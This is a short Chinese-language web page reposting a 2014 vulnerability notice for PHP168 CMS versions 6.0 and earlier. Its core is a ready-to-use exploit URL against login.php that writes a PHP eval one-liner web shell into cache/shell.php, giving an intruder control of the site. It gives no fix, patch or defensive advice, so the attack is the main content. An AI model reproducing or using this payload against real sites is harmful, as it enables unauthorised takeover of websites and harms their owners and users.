国内最全IT社区平台 联系我们 | 收藏本站
华晨云阿里云优惠2
您当前位置:首页 > php开源 > DedeCMS > PHP168 整站系统6.0及以下版本漏洞

PHP168 整站系统6.0及以下版本漏洞

来源:程序员人生   发布时间:2014-06-14 20:25:02 阅读次数:2894次

  网(LieHuo.Net)教程 最近在研究PHP,那个劲啊,就甭提鸟,本文引自黑客动画吧。

以下为引用的内容:
危险等级:高
影响版本:PHP168 6.0以下版本
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。
出问题的文件
login.php
login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a]);?>
写到:cache/shell.php

生活不易,码农辛苦
如果您觉得本网站对您的学习有所帮助,可以手机扫描二维码进行捐赠
程序员人生
------分隔线----------------------------
分享到:
------分隔线----------------------------
关闭
程序员人生